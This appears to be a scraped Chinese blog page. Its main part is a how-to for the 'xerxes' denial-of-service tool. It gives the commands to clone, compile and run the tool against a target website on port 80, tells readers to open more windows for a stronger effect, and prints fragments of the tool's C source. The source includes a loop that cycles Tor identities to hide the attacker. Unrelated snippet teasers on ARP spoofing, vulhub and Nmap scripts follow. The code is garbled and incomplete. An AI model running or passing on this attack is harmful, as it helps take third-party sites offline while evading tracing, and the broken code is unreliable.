1、
cd /tmp
git clone
cd xerxes
gcc xerxes.c -o xerxes
./xerxes 目標**,www開頭 埠,一般是80
#如果感覺效果不是很明顯,可以多開幾個視窗跑一樣的內容。
檢測**是否down掉了。把要檢測**粘入即可。
示例指令碼xerxes.c:
/* xerxes - most powerful dos tool - #sj edited by mr.thg */
#include #include #include #include #include #include #include #include #include #include #include int make_socket(char *host, char *port)
for(p = servinfo; p != null; p = p->ai_next)
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1)
break;
}if(p == null)
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[connected -> %s:%s]\n", host, port);
return sock;}
void broke(int s)
#define connections 8
#define threads 48
void attack(char *host, char *port, int id) else
// fprintf(stderr, "socket[%i->%i] -> %i\n", x, sockets[x], r);
fprintf(stderr, "[%i: packet sent]\n", id);
}fprintf(stderr, "[%i: packet sent]\n", id);
usleep(300000);
}} void cycle_identity() {
int r;
int socket = make_socket("localhost", "9050");
write(socket, "authenticate \"\"\n", 16);
while(1) {
r=write(socket, "signal newnym\n\x00", 16);
fprintf(stderr, "[%i: cycle_identity -> signal newnym\n", r);
usleep(300000);
Kali 下的 ARP斷網實驗實現過程
位址解析協議是建立在網路中各個主機互相信任的基礎上的,網路上的主機可以自主傳送arp應答訊息,其他主機收到應答報文時 不會檢測該報文的真實性 就會將其記入本機arp快取 由此攻擊者就可以向某一主機傳送偽arp應答報文,使其傳送的資訊無法到達預期的主機或到達錯誤的主機,這就構成了乙個arp欺騙 ifc...
kali下vulhub的使用
sudo service docker start 啟動docker服務cd ls 命令進入目標檔案下 本次例項 vulhub activemq cve 2016 3088 執行命令 docker compose up d 推薦 或者 docker compose build 編譯環境啟動容器ps ...
kali基於指令碼的掃瞄工具 Nmap
kali系統在 usr share nmap scripts 裡放著各種掃瞄指令碼 說下幾種常用的掃瞄指令碼型別 漏洞利用 vuln 許可權驗證 auth 暴力破解 brute 服務資訊發現 discovery dos攻擊 dos 當然還有很多。使用命令 nmap script 指令碼名稱 引數 目...